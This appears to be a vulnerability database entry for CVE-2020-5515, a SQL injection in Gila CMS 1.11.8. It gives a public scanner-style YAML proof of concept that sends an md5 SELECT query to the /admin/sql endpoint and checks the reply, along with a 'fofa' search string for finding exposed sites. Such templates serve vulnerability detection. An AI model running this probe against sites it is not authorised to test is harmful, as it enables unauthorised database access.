CVE-2020-5515: Gila CMS 1.11.8 SQL Injection.

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

Gila CMS 1.11.8 SQL Injection. fofa: "Gila CMS"

PoC code [public]

id: CVE-2020-5515

info:
  name: Gila CMS 1.11.8 SQL Injection.
  author: PickledFish
  severity: high
  description: |-
    Gila CMS 1.11.8 SQL Injection.
    fofa: "Gila CMS"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5515
  tags: cve,cve2020,gila,sqli
  created: 2023/08/17

set:
  r1: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /admin/sql?query=SELECT%20md5({{r1}})
    expression: response.body.bcontains(bytes(md5(string(r1))))
expression: r0()